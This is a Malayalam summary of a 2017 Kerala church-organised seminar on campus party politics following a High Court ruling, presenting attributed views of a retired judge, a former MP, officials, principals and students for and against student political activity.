(2017 നവംബര്‍ 21-ാം തീയതി, പി.ഒ.സിയില്‍ കെസിബിസി സെക്രട്ടറിയേറ്റും ഐക്യജാഗ്രതാകമ്മീഷനും സംയുക്തമായി നടത്തിയ ‘ക്യാമ്പസും കക്ഷിരാഷ്ട്രീയവും കോടതിവിധിയുടെ പശ്ചാത്തലത്തില്‍’ എന്ന പഠനശിബിരത്തില്‍ അവതരിപ്പിച്ച പ്രബന്ധത്തിന്‍റെയും പ്രതികരണത്തിന്‍റെയും സംക്ഷിപ്തം)
വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയം നിറുത്തിയാല്‍ അഴിമതിയും വര്‍ഗീയതയും ലഹരിയും വര്‍ദ്ധിക്കുമെന്ന ആരോപണം വസ്തുതാവിരുദ്ധം: ജസ്റ്റിസ് സിറിയക് ജോസഫ്
ഇപ്പോള്‍ ഹൈക്കോടതിയില്‍ നിന്നുണ്ടായിരിക്കുന്ന വിധി ഈ വിഷയത്തില്‍ മുമ്പുണ്ടായ സുപ്രീംകോടതി/ഹൈക്കോടതി വിധികളുടെ തുടര്‍ച്ചയാണ് കലാലയരാഷ്ട്രീയത്തിനെതിരായി കോടതിവിധികള്‍ വരുന്നത് ആദ്യമല്ല. “കോളേജില്‍ പോലീസ് സംരക്ഷണം നല്‍കണമെന്ന നേരത്തെയുള്ള ഒരു കോടതിവിധിയുടെ പശ്ചാത്തലത്തില്‍ വന്ന കോടതിയലക്ഷ്യഹര്‍ജിയിലാണ് ക്യാംപസുകളില്‍ വിദ്യാര്‍ത്ഥികള്‍ രാഷ്ട്രീയപ്രവര്‍ത്തനത്തിലേര്‍പ്പെടുന്നതിനെതിരേ കോടതി ഇപ്പോള്‍ വിധി പ്രസ്താവിച്ചിരിക്കുന്നത്. വിദ്യാഭ്യാസസ്ഥാപനങ്ങളില്‍ രാഷ്ട്രീയവും രാഷ്ട്രീയപ്രവര്‍ത്തനങ്ങളും അനുവദിക്കാനാകില്ല എന്നാണു കോടതി വ്യക്തമാക്കുന്നത്. ധര്‍ണ, നിരാഹാരസമരം, സത്യഗ്രഹം, തുടങ്ങിയവയ്ക്ക് ഒരു ഭരണഘടനാപരമായ ജനാധിപത്യത്തില്‍ സ്ഥാനമില്ലെന്നും വിദ്യാഭ്യാസ സ്ഥാപനങ്ങളില്‍ അവ ഒട്ടും അനുവദനീയമല്ലെന്നും വിധിയില്‍ കോടതി വിശദീകരിക്കുന്നുണ്ട്. ഇത്തരം പ്രവര്‍ത്തനങ്ങള്‍ നടത്തുന്നവര്‍ ശിക്ഷാനടപടികള്‍ നേരിടാന്‍ ബാദ്ധ്യസ്ഥരാണ്. വിദ്യാഭ്യാസസ്ഥാപനങ്ങള്‍ വിദ്യാഭ്യാസം നല്കാനുദ്ദേശിച്ചുള്ളവയാണ്, രാഷ്ട്രീയമല്ല. വിദ്യാഭ്യാസം ലഭിക്കുന്നതിനു ബഹുഭൂരിപക്ഷം വിദ്യാര്‍ത്ഥികള്‍ക്കുള്ള അവകാശത്തെ രാഷ്ട്രീയസംഘടനകള്‍ ലംഘിക്കരുത് – കോടതി പറയുന്നു.”
വിദ്യാര്‍ത്ഥികള്‍ക്കുള്ള പരാതികള്‍ പരിഹരിക്കുന്നതിനു നൈയാമികമായ വേദികള്‍ ഇപ്പോള്‍ തന്നെ കലാലയങ്ങളിലുണ്ടെന്നും കോടതി ചൂണ്ടിക്കാട്ടി. “അത്തരം വേദികളില്‍ പരാതികള്‍ ഉന്നയിക്കാവുന്നതാണ്. അതിനു പകരം ധര്‍ണയോ സമരമോ പഠിപ്പുമുടക്കോ നടത്തുന്നതു ശരിയല്ല. ക്യാംപസിനകത്ത് രാഷ്ട്രീയപ്രവര്‍ത്തനം പാടില്ല എന്നാണു കോടതി വ്യക്തമാക്കിയിരിക്കുന്നത്. വിദ്യാര്‍ത്ഥികള്‍ക്കു രാഷ്ട്രീയം പാടില്ല എന്നല്ല. അക്കാദമിക് അന്തരീക്ഷത്തെ തകര്‍ക്കുന്ന പ്രവര്‍ത്തനങ്ങള്‍ കലാലയത്തിനകത്തു പാടില്ല.”
കക്ഷിരാഷ്ട്രീയം കൂടാതെ തന്നെ പാര്‍ലിമെന്‍ററി പ്രവര്‍ത്തനപരിചയത്തിനു കലാലയങ്ങളില്‍ അവസരമുണ്ടായിരുന്നു. സ്കൂള്‍ പാര്‍ലിമെന്‍റും കോളേജ് യൂണിയനും യൂണിവേഴ്സിറ്റി യൂണിയനും പോലുള്ള സംവിധാനങ്ങള്‍ വേണം.
“കുറച്ചു പേര്‍ക്ക് എംഎല്‍എ യും എംപിയും ആകാന്‍ വേണ്ടി ബഹുഭൂരിപക്ഷം വരുന്ന വിദ്യാര്‍ത്ഥികളെ ദ്രോഹിക്കുന്ന സംവിധാനം ആവശ്യമില്ല. വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയം നിറുത്തിയാല്‍ അഴിമതിയും വര്‍ഗീയതയും ലഹരിയും വര്‍ദ്ധിക്കുമെന്ന ആരോപണം വസ്തുതാവിരുദ്ധമാണ്”
സമാനവിഷയത്തിലെ മുന്‍ കോടതിവിധികള്‍ ജസ്റ്റിസ് സിറിയക് ജോസഫ് ഹ്രസ്വമായി വിവരിച്ചു. “1997-ല്‍ സുപ്രീം കോടതിയുടെ ഒരു വിധിയുണ്ടായി. കോളേജിലെ അക്രമത്തെ തുടര്‍ന്നുണ്ടായ കൊലപാതകത്തിന്‍റെ അപ്പീല്‍ സുപ്രീം കോടതിയില്‍ വന്നപ്പോള്‍ ജസ്റ്റിസ് കെ. ടി. തോമസ് അടങ്ങുന്ന ബഞ്ച് കലാലയരാഷ്ട്രീയത്തിന്‍റെ ദോഷങ്ങള്‍ ജനശ്രദ്ധയില്‍ കൊണ്ടുവന്നിട്ടുണ്ട്. രാഷ്ട്രീയപാര്‍ട്ടികള്‍ യുവജനങ്ങളെ ആകര്‍ഷിക്കുന്നതിന് വിദ്യാര്‍ത്ഥി വിഭാഗങ്ങളിലൂടെ ശ്രമിക്കുന്നതിനെതിരായ പരാമര്‍ശങ്ങള്‍ അതിലുണ്ട്. കൗമാരപ്രായത്തിലുള്ള കുട്ടികളുടെ മാനസികാവസ്ഥയെ രാഷ്ട്രീയപാര്‍ട്ടികള്‍ ചൂഷണം ചെയ്യുന്നുവെന്നും രാഷ്ട്രീയപ്രവര്‍ത്തനത്തിനിടെ തങ്ങളുടെ സഹവിദ്യാര്‍ത്ഥികളോടുള്ള ശത്രുതാമനോഭാവം അവരില്‍ വളര്‍ന്നു വരികയാണെന്നു രാഷ്ട്രീയപാര്‍ട്ടികള്‍ മനസ്സിലാക്കണമെന്നും ആ വിധിയില്‍ സുപ്രീം കോടതി നിരീക്ഷിച്ചു. സ്കൂള്‍ പാര്‍ലിമെന്‍റിലേയ്ക്കുള്ള തിരഞ്ഞെടുപ്പ് രാഷ്ട്രീയസംഘടനാ അടിസ്ഥാനത്തിലായിരിക്കരുതെന്ന് 1998-ല്‍ ഹൈക്കോടതിയും ഒരു വിധി പുറപ്പെടുവിച്ചിട്ടുണ്ട്. പാലാ സെന്‍റ്. തോമസ് കോളേജ് വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയം സംബന്ധിച്ചു നല്‍കിയ മാര്‍ഗനിര്‍ദേശം ശരിയാണെന്നു 2003-ലെ ഒരു വിധിയില്‍ ഹൈക്കോടതി ഡിവിഷന്‍ ബഞ്ചു തീര്‍പ്പു കല്‍പിച്ചിട്ടുണ്ട്. കോളേജ് രാഷ്ട്രീയം നിരോധിച്ചുകൊണ്ടു മാനേജ്മെന്‍റ് ഏര്‍പ്പെടുത്തിയ വ്യവസ്ഥകള്‍ ഹൈക്കോടതി അംഗീകരിക്കുകയായിരുന്നു. ഇതേ കേസിലെ റിവ്യൂ പെറ്റീഷ നും സമാനമായ മറ്റു ചില കേസുകളും കൂടി പരിഗണിച്ചുകൊണ്ട് 2004-ലും സമാനമായ വിധി ഹൈക്കോടതി പുറപ്പെടുവിച്ചിട്ടുണ്ട്. ക്യാംപസിനകത്തെ ധര്‍ണയും സത്യഗ്രഹവും ഘെരാവോയും ആ കോടതിവിധിയും നിരോധിച്ചിട്ടുണ്ട്.”
ഇതൊന്നും പോരെങ്കില്‍ പാക്കിസ്ഥാന്‍ സുപ്രീം കോടതിയും 1993-ല്‍ ഇതേ നിലയില്‍ ഒരു വിധി പ്രസ്താവിച്ചിട്ടുണ്ടെന്ന് ജസ്റ്റിസ് സിറിയക് ചൂണ്ടിക്കാട്ടി. “സമാധാനപൂര്‍ണമായ അന്തരീക്ഷത്തില്‍ പഠിക്കാനുള്ള ബഹുഭൂരിപക്ഷത്തിന്‍റെ അവകാശത്തെ ഒരു ന്യൂനപക്ഷത്തിന്‍റെ താത്പര്യങ്ങള്‍ക്കുവേണ്ടി ബലികഴിക്കാനാകില്ല എന്നാണ് പാക് പരമോന്നത കോടതിയും വ്യക്തമാക്കിയിട്ടുള്ളത്.”
കോടതിവിധികളില്‍ വ്യക്തത വേണം
ഡോ. സെബാസ്റ്റ്യന്‍ പോള്‍
രാഷ്ട്രീയാടിസ്ഥാനത്തില്‍ പ്രവര്‍ത്തിക്കുന്ന സംഘടനകളെ ക്യാംപസുകളില്‍ നിന്ന് ഒഴിവാക്കുമ്പോള്‍ പകരം വരുന്നത് മതാടിസ്ഥാനത്തില്‍ പ്രവര്‍ത്തിക്കുന്ന സംഘടനകളാകും. മതസംഘടനകളെ തടയാന്‍ കഴിയില്ല. തടയണം എന്നാരും പറയുന്നുമില്ല. ഏതാണ് കൂടുതല്‍ വലിയ വിപത്ത് എന്ന് ആലോചിക്കേണ്ടിയിരിക്കുന്നു. വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തെ എതിര്‍ത്തു വിധി പ്രസ്താവിച്ച സുപ്രീംകോടതി ജഡ്ജി ജസ്റ്റിസ് കെ.ടി. തോമസ് വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തില്‍ സജീവമായി ഇടപെട്ടിരുന്നയാളായിരുന്നു. രാഷ്ട്രീയപ്രവര്‍ത്തനം അറിയാത്തയാളല്ല അദ്ദേഹം. പക്ഷേ അദ്ദേഹം സുപ്രീംകോടതിയിലെത്തിയപ്പോള്‍ പറഞ്ഞത് രാഷ്ട്രീയം വേണ്ട എന്നാണ്. വേണ്ട എന്നു പറയാന്‍ എളുപ്പമാണ്. ജുഡീഷ്യറി 1997 മുതല്‍ ഇങ്ങോട്ട് പല തരത്തില്‍ ഇക്കാര്യം പറഞ്ഞിട്ടുണ്ട്. നിരോധനം വേണം, നിയന്ത്രണം വേണം എന്നെല്ലാം. ക്യാംപസുകളില്‍ അരാജകത്വം വേണം എന്ന അഭിപ്രായം എനിക്കില്ല. പക്ഷേ 18 വയസ്സു മുതല്‍ വോട്ട് ചെയ്യേണ്ട വിദ്യാര്‍ത്ഥികളാണ് ക്യാംപസുകളില്‍ പഠിക്കുന്നതെന്നു മറക്കരുത്.
വ്യക്തിയുടെ സ്വാതന്ത്ര്യങ്ങള്‍ വിപുലീകരിക്കുന്നതില്‍ വളരെ കനത്ത സംഭാവനകള്‍ പല തരത്തില്‍ നല്‍കിയിട്ടുള്ള ഇന്ത്യന്‍ ജുഡീഷ്യറി തന്നെ മറ്റു ചില കാര്യങ്ങള്‍ വരുമ്പോള്‍ വ്യക്തിസ്വാതന്ത്ര്യത്തെ പരിമിതപ്പെടുത്തുകയും അപഹരിക്കുകയും ചെയ്യുന്ന നിലപാടുകളിലേയ്ക്ക് എത്തുന്ന സ്ഥിതിയുണ്ട്- ഡോ. സെബാസ്റ്റ്യന്‍ പോള്‍ അഭിപ്രായപ്പെട്ടു. “കോളേജില്‍ വരുന്നവര്‍ പഠിക്കണം എന്നെല്ലാമുള്ള നിരവധി ഉപദേശങ്ങള്‍ ഈ വിധിയിലുണ്ട്. കോളേജില്‍ വരുന്നവര്‍ പഠിക്കണം. എന്നാല്‍, എല്ലാ മാറ്റങ്ങളും സമൂഹത്തില്‍ കൊണ്ടുവരുന്നത് കോളേജില്‍ പഠിച്ചവരല്ല. മന്ത്രിയും എംഎല്‍എയും ആകുന്നതിന് കോളേജുകളില്‍ രാഷ്ട്രീയം കളിക്കുന്നു എന്നു പറയുന്നത് ആ വിഷയത്തെ ഗൗരവത്തോടെ കാണാത്തതുകൊണ്ടാണ്.”
“കോടതിവിധികളില്‍ വ്യക്തത വേണം. രാഷ്ട്രീയപ്രവര്‍ത്തനം നിരോധിക്കുന്നു എന്നു കോടതി പറയുമ്പോള്‍ എന്താണു രാഷ്ട്രീയപ്രവര്‍ത്തനം എന്നു കോടതി വിശദീകരിക്കേണ്ടതുണ്ട്. അതു പറയാത്തിടത്തോളം നമ്മുടെ മാനേജ്മെന്‍റുകള്‍ അതിനെ എങ്ങനെയെടുക്കും എന്നു പറയാന്‍ കഴിയില്ല. മാനേജര്‍മാര്‍ക്കു പരമാധികാരം നല്‍കുന്ന ഒരു വിധി കോടതി നല്‍കിയിട്ട് അതു വിദ്യാര്‍ത്ഥികള്‍ അനുസരിച്ചുകൊള്ളണം എന്നു പറയുന്നതില്‍ ചില പ്രശ്നങ്ങളുണ്ട്. കോടതിവിധിയുടെ അടിസ്ഥാനത്തില്‍ നിയമനിര്‍മ്മാണം വേണമെന്ന് എ.കെ. ആന്‍റണി പറഞ്ഞിട്ടുണ്ട്. എന്താണ് രാഷ്ട്രീയ പ്രവര്‍ത്തനം, ക്യാംപസുകളില്‍ വിദ്യാര്‍ത്ഥികള്‍ക്ക് ഏതൊക്കെ രീതിയില്‍ സംഘടിക്കാം, പ്രവര്‍ത്തിക്കാം എന്നതിനെ സംബന്ധിച്ചു നിയമത്തില്‍ വ്യക്തത വേണം. നിയമം ലംഘിക്കുന്നവര്‍ക്കുള്ള ശിക്ഷ നിയമത്തിലുണ്ടാകണം. അതല്ലെങ്കില്‍ മാനേജ്മെന്‍റുകള്‍ വിദ്യാര്‍ത്ഥികളെ പീഡിപ്പിക്കും.”
പല മാനേജ്മെന്‍റുകളുടെയും ഏറ്റവും വലിയ വിനോദം കുട്ടികളെ പരീക്ഷ എഴുതിക്കാതിരിക്കുക എന്നതാണെന്ന് ഹൈക്കോടതിയിലെ അനുഭവങ്ങളുടെ വെളിച്ചത്തില്‍ എനിക്ക് മനസ്സിലായിട്ടുള്ളത.് “പലരും പരീക്ഷയെഴുതുന്നത് ഹൈക്കോടതി ഉത്തരവിന്‍റെ അടിസ്ഥാനത്തിലാണ്. ഇപ്രകാരം ഏകപക്ഷീയമായി പ്രിന്‍സിപ്പാള്‍മാര്‍ക്കും മാനേജ്മെന്‍റിനും വിദ്യാര്‍ത്ഥികളുടെ ഭാവിയെ ബാധിക്കുന്ന രീതിയില്‍ ഇടപെടുന്നതിനു സാധിക്കുന്ന സാഹചര്യം ഒഴിവാക്കണം. സ്വന്തമായി ചിന്തിക്കുകയും നിലപാടെടുക്കുകയും വിമര്‍ശിക്കുകയും എല്ലാം ചെയ്യേണ്ടവരാണു വിദ്യാര്‍ത്ഥികള്‍. അങ്ങനെയാണവര്‍ വളര്‍ന്നു വരേണ്ടത്. സുവിശേഷത്തില്‍ എന്നെ ഏറ്റവും കൂടുതല്‍ ആകര്‍ഷിച്ചിട്ടുള്ള ബൈബിള്‍ ഭാഗം 12 വയസ്സുള്ള യേശുവിനെക്കുറിച്ചു പറയുന്നതാണ്. ജറുസലേം ദേവാലയത്തിലെ ജ്ഞാനികളായ മഹാപുരോഹിതരോടു തര്‍ക്കിക്കുന്ന ഒരു യേശു. എന്താണു തര്‍ക്കിച്ചതെന്നും എന്താണ് അതിന്‍റെ അനന്തരഫലമെന്നും നമുക്കറിയില്ല. പിന്നെ യേശുവിനെ കാണുന്നത് 18 വര്‍ഷങ്ങള്‍ കഴിഞ്ഞാണ്. തര്‍ക്കിക്കുകയും ചോദ്യങ്ങള്‍ ചോദിക്കുകയും കലഹിക്കുകയും ചെയ്യുന്ന വിദ്യാര്‍ത്ഥികളെ 12 വര്‍ഷത്തെയും 18 വര്‍ഷത്തെയും അജ്ഞാതവാസത്തിനും വനവാസത്തിനും അയക്കാതെ അവരുടെ ചോദ്യങ്ങളെയും യുക്തിയെയും പ്രോത്സാഹിപ്പിക്കുകയാണു വേണ്ടത്. അതിനു സഹായകരമായ വിധിയല്ല ഇപ്പോള്‍ വന്നിരിക്കുന്നത്. വിധിയുടെ സ്പിരിറ്റ് ഉള്‍ക്കൊണ്ടുകൊണ്ട് അതു പ്രായോഗികമാക്കുന്നതിനുള്ള നിയമനിര്‍മ്മാണത്തിലേക്ക് പാര്‍ലിമെന്‍റ് പോകണം. കോളേജുകളില്‍ രാഷ്ട്രീയം അനുവദിക്കാം, അനുവദിക്കരുത് എന്നെല്ലാം പറയുമ്പോള്‍ വ്യക്തിതാത്പര്യങ്ങളല്ല, ഭരണഘടനയാകണം അടിസ്ഥാനമാകേണ്ടത്. ജനാധിപത്യവ്യവസ്ഥിതികള്‍ പ്രവര്‍ത്തിക്കുന്നത് രാഷ്ട്രീയപാര്‍ട്ടികളിലൂടെയാണ്. അതുകൊണ്ട് അതുപാടില്ല എന്നു പറയരുത്. കോടതികള്‍ പല വിധികളും പുറപ്പെടുവിച്ചിട്ടുണ്ട്. പണിമുടക്കാനുള്ള അവകാശം ഭരണഘടന മുഴുവന്‍ വായിച്ചു നോക്കിയിട്ടും തങ്ങള്‍ കണ്ടില്ല എന്നു പറഞ്ഞിട്ടുള്ള കോടതിയാണിത്. വിദ്യാഭ്യാസരംഗത്തെ വയലന്‍സ് ഇപ്പോള്‍ കണ്ടുപിടിച്ചതല്ല. ദ്രോണര്‍ ശിഷ്യനില്‍ നിന്ന് പെരുവിരല്‍ മുറിച്ചു വാങ്ങിയപ്പോള്‍ തുടങ്ങിയ വയലന്‍സാണത്.”
കോളേജുകള്‍ രാഷ്ട്രീയപാര്‍ട്ടികളുടെ റിക്രൂട്ടിംഗ് സെന്‍ററുകളാകരുത് :
പി സി സിറിയക് ഐ.എ.എസ്
ഒരു രാഷ്ട്രീയപാര്‍ട്ടി ഭരിക്കുമ്പോള്‍ അവരുടെ വിദ്യാര്‍ത്ഥിസംഘടനകള്‍ സമരം ചെയ്യാറില്ല എന്നതു തന്നെ അന്ധമായ രാഷ്ട്രീയവിധേയത്വമാണ് സംഘടനകള്‍ക്കുള്ളതെന്നതിനു തെളിവാണ്. “മഹാരാജാസില്‍ പ്രിന്‍സിപ്പാളിന്‍റെ കസേര കത്തിച്ചതും യൂണിയന്‍ മുറിയില്‍ നിന്നു മാരകായുധങ്ങള്‍ കണ്ടെത്തിയതും വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തിലെ അക്രമപ്രവണതകള്‍ക്കു തെളിവാണ്. സ്കൗട്ട്, എന്‍സിസി, പ്ലാനിംഗ് ഫോറം, മാഗസിന്‍ തുടങ്ങിയ പാഠ്യേതര പ്രവര്‍ത്തനങ്ങള്‍ക്കു രാഷ്ട്രീയം വേണമെന്നില്ല. നാളത്തെ പൗരന്മാരായ ഇന്നത്തെ വിദ്യാര്‍ത്ഥികളുടെ പ്രശ്നങ്ങളേറ്റെടുത്ത് സ്വതന്ത്രമായി പ്രവര്‍ത്തിക്കുന്ന വിദ്യാര്‍ത്ഥിസംഘടനകളാണാവശ്യമെന്നും കക്ഷിരാഷ്ട്രീയാടിസ്ഥാനത്തിലുള്ളതല്ലെന്നും ഇഎംഎസ് നമ്പൂതിരിപ്പാട് തന്നെ എഴുതിയിട്ടുണ്ട്. വിദ്യാര്‍ത്ഥിപ്രസ്ഥാനം ഇന്ന്, ഇന്നലെ, നാളെ എന്ന പുസ്തകത്തില്‍ രാഷ്ട്രീയനേതാക്കള്‍ വരച്ച വരയില്‍ നിന്നു പ്രവര്‍ത്തിക്കരുത് വിദ്യാര്‍ത്ഥിനേതാക്കളെന്നു ഇഎംഎസ് വ്യക്തമായി പറയുന്നുണ്ട്. ക്യാംപസ് രാഷ്ട്രീയം ഒരു പുനര്‍വായന എന്ന പേരില്‍ ഇടതുപക്ഷ നേതാവായ ഡോ. ബി ഇക്ബാല്‍ എഴുതിയ ലേഖനത്തിലാണ് ഈ കാര്യം അദ്ദേഹം പരാമര്‍ശിക്കുന്നത്. ഇഎംഎസിനെ പോലുള്ള ദീര്‍ഘവീക്ഷണമുള്ള രാഷ്ട്രീയ നേതാക്കള്‍ പോലും രാഷ്ട്രീയകക്ഷികള്‍ ഹ്രസ്വദൃഷ്ടിയോടെ വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തില്‍ ഇടപെടുന്നതിനെതിരായി പറഞ്ഞിരിക്കുകയാണ്. ഇതു നമ്മുടെ നേതാക്കള്‍ മനസ്സിലാക്കുന്നില്ല. ഇടതുപക്ഷനേതാക്കളും കോണ്‍ഗ്രസ് നേതാക്കളും മനസ്സിലാക്കുന്നില്ല. രാഷ്ട്രീയപാര്‍ട്ടികളുടെ റിക്രൂട്ടിംഗ് സെന്‍ററുകളാകരുത് കോളേജുകള്‍.”
രാഷ്ട്രീയപാര്‍ട്ടികള്‍ ഇല്ലാത്തതുകൊണ്ട് ഗുണമേ ഉണ്ടായിട്ടുള്ളൂ, രാഷ്ട്രീയ സംഘടനകളുള്ള കോളേജുകളില്‍ ഉള്ള പ്രവര്‍ത്തനങ്ങളെല്ലാം തെരേസാസിലും ഉണ്ട്. എന്നാല്‍ സമരം മൂലം അദ്ധ്യായനദിനങ്ങള്‍ നഷ്ടപ്പെടുന്നുമില്ല.
അനീറ്റ, സെ. തെരേസാസ് കോളേജ്
വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തില്‍ നിന്നുള്ള തിക്താനുഭവം മൂലം തനിക്ക് കൊച്ചിന്‍ കോളേജിന്‍റെ പ്രിന്‍സിപ്പാള്‍ പദവി രാജിവയ്ക്കേണ്ടിവന്നു. കോളേജുകളിലെ രാഷ്ട്രീയത്തിന് ആശയപരമായി എതിരല്ല. കോളേജുകള്‍ക്കകത്തെ കാര്യങ്ങള്‍ പുറത്തുള്ള രാഷ്ട്രീയ നേതാക്കള്‍ തീരുമാനിക്കുന്ന ഇന്നത്തെ രീതിയാണ് കുഴപ്പങ്ങള്‍ക്കു കാരണം. തീരുമാനം ക്യാംപസില്‍ തന്നെ എടുക്കുകയാണെങ്കില്‍ ക്യാംപസ് രാഷ്ട്രീയം പ്രയോജനകരമാണ്.
പ്രൊഫ. എന്‍ അജിത് കുമാര്‍, മുന്‍ പ്രിന്‍സിപ്പല്‍, കൊച്ചിന്‍ കോളേജ്
വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തെക്കുറിച്ച് പഠിച്ചതിനു ശേഷമാണ് തന്‍റെ നിലപാട് അവതരിപ്പിക്കുന്നത്. “78 മുതലുള്ള സാഹചര്യങ്ങള്‍ പരിശോധിച്ചാല്‍ പൊതുവായ ലക്ഷ്യങ്ങള്‍ക്കു വേണ്ടി ഒന്നിച്ചുപ്രവര്‍ത്തിക്കാന്‍ വിവിധ സംഘടനകള്‍ക്കു സാധിക്കുന്നില്ല എന്നു കാണാം. എന്നാല്‍ നേരിയ കാര്യമുണ്ടാകുമ്പോള്‍ പരസ്പരം ആക്രമിക്കുകയും കോളേജ് അടച്ചിടേണ്ട സാഹചര്യത്തിലേക്കു പോകുകയും ചെയ്യും. കോളേജില്‍ വിദ്യാര്‍ത്ഥികളുടെ രാഷ്ട്രീയപ്രവര്‍ത്തനത്തിന്‍റെ കാലയളവു പരിശോധിക്കുമ്പോള്‍ ഒരു കാര്യം മനസ്സിലാകും. ഒന്നാം വര്‍ഷം രാഷ്ട്രീയത്തില്‍ പ്രവേശിക്കുന്ന കുട്ടികളുടെ 15 ശതമാനം മാത്രമേ രണ്ടാം വര്‍ഷവും മൂന്നാം വര്‍ഷവും സജീവരാഷ്ട്രീയത്തില്‍ നിലനില്‍ ക്കുന്നുള്ളൂ. അതിനര്‍ത്ഥം അവസാനവര്‍ഷത്തെ കുറച്ചു നേതാക്കള്‍ ആദ്യവര്‍ഷക്കാരായ കുട്ടികളെ ഉപയോഗിച്ചു രാഷ്ട്രീയപ്രവര്‍ത്തനം നടത്തുന്നുവെന്നാണ്. എന്താണു രാഷ്ട്രീയമെന്നറിയാതെ പ്ലസ് ടുവില്‍ നിന്നു കയറി വരുന്ന കുട്ടികളെ ഉപയോഗിച്ചു മുതിര്‍ന്നവര്‍ സംഘര്‍ഷങ്ങള്‍ ഉണ്ടാക്കുകയാണ്. സംഘടനകളുടെ ആദര്‍ശങ്ങള്‍ നല്ലതാണെങ്കിലും പ്രായോഗികതലത്തില്‍ അവയെല്ലാം കാറ്റില്‍ പറത്തുന്നതായാണ് കഴിഞ്ഞ 25 വര്‍ഷത്തെ അനുഭവം.
ഫാ. ജോയ് ഉള്ളാട്ടില്‍, ഡോണ്‍ ബോസ്കോ കോളേജ്, സുല്‍ത്താന്‍ ബത്തേരി
“വിദ്യാര്‍ത്ഥികളുടെ പരാതികള്‍ പരിഹരിക്കുന്നതിന് ഭരണഘടനാപരമായ മാര്‍ഗങ്ങള്‍ ഉണ്ട്. ഇത്തരം കോടതിവിധികളുടെ ഫലമായി പഠിപ്പുമുടക്കിയുള്ള സമരങ്ങള്‍ കോളേജുകളില്‍ കുറഞ്ഞിട്ടുണ്ട്.”
ഡോ.ഐപ്പ് തോമസ്, പ്രിന്‍സിപ്പല്‍, ഭാരതമാതാ കോളേജ, തൃക്കാക്കര
കോടതിവിധി സന്തോഷത്തോടെ സ്വീകരിക്കാനാവില്ല. “മാനേജ്മെന്‍റുകളുടെ ഭാഗത്തു നിന്നു ചിന്തിക്കുമ്പോള്‍ നല്ലതാണെന്നു തോന്നാമെങ്കിലും വിദ്യാര്‍ത്ഥികളുടെ ഭാഗത്തു നിന്നു ചിന്തിക്കുമ്പോള്‍ സ്വീകാര്യമല്ല. രാഷട്രീയത്തിലേയ്ക്ക് ഇറങ്ങേണ്ടത് ഈ വിദ്യാര്‍ത്ഥികള്‍ തന്നെയാണ്.”
ഫാ. ബാബു പോള്‍ എസ്.ജെ, ഐക്കഫിന്‍റെ സ്റ്റേറ്റ് അഡ്വൈസര്‍
വിദ്യാര്‍ത്ഥിസംഘടനകളില്ലെങ്കില്‍ മാനേജ്മെന്‍റുകള്‍ ഏകാധിപത്യമാകും കോളേജുകളില്‍ നടത്തുക. വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയ സംഘടനകളില്ലെങ്കില്‍ മതസംഘടനകള്‍ രംഗം കൈയടക്കുകയും വര്‍ഗീയത വളരുകയും ചെയ്യും.
ഹരികൃഷ്ണന്‍, യൂണിയന്‍ ചെയര്‍മാന്‍, എസ്.എച്ച് കോളേജ്, തേവര
വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തിന് അനുകൂലമായ നിലപാടാണ്. “പ്രായം നാല്‍പതു കടന്നവരുടെ നീതിബോധവും 22 വയസ്സുകാരുടെ സമീപനവും വ്യത്യസ്തമായിരിക്കും. ഇരുപതുകാരുടെ സത്യസന്ധതയും നീതിബോധവും നാല്‍പതു കഴിയുമ്പോഴേയ്ക്കും നഷ്ടപ്പെടുകയും ഒത്തുതീര്‍പ്പിന്‍റെ അവസ്ഥയിലേയ്ക്ക് എത്തുകയും ചെയ്യും. ആ അവസ്ഥയിലെത്തിയവരാണ് വിദ്യാര്‍ത്ഥിരാഷ്ട്രീയത്തിന്‍റെ വിമര്‍ശകരായി ഏറെയും രംഗത്തു വരുന്നത്. പഠിക്കണമെങ്കില്‍ അതിനുള്ള സാഹചര്യം ആദ്യമുണ്ടാകണം. ഒരു ന്യൂനപക്ഷമാണ് രാഷ്ട്രീയത്തില്‍ സജീവമാകുന്നത്. എന്നാല്‍ എന്നും ഒരു ന്യൂനപക്ഷത്തില്‍ നിന്നാണ് സമൂഹത്തിന് ഏതു രംഗത്തും പ്രയോജനങ്ങള്‍ ഉണ്ടാകാറുള്ളത്. അതുകൊണ്ട് ആ ന്യൂനപക്ഷത്തെ അവഗണിക്കുകയല്ല, കൈപിടിച്ചുയര്‍ത്തുകയാണു വേണ്ടത്. മാനേജ്മെന്‍റുകള്‍ക്ക് തിരുത്തല്‍ ശക്തിയായി നില്‍ക്കേണ്ടത് വിദ്യാര്‍ത്ഥിസമൂഹമാണ്. എയിഡഡ് കോളേജുകളില്‍ പോലും വിദ്യാര്‍ത്ഥികള്‍ക്കു പിടിച്ചു നില്‍ക്കാന്‍ സാധിക്കാത്ത സ്ഥിതിയുണ്ട്. ഇംഗ്ലീഷ് മീഡീയം/സിബിഎസ്ഇ സ്കൂളുകളുടെ അകത്തളങ്ങളിലിരുന്ന് സമൂഹത്തെ കാണാതെ വരുന്നവരാണോ ഇത്തരം വിധികള്‍ പുറപ്പെടുവിക്കുന്നതെന്ന ആശങ്ക പ്രസക്തമാണ്. പുറമെ നിന്നുള്ളവരുടെ സ്വാധീനം ഉണ്ടാകുന്നതു സ്വാഭാവികമാണ്. കുട്ടികള്‍ക്ക് കുട്ടികളുടേതായ രാഷ്ട്രീയമുണ്ടാകുകയും അവര്‍ തിരുത്തല്‍ ശക്തിയായി നില്‍ക്കുകയും വേണം.”
വി.എസ്. സെബാസ്റ്റ്യന്‍, സ്റ്റുഡന്‍റസ് അഡ്വൈസര്‍, എസ് എച്ച് കോളേജ്, തേവര
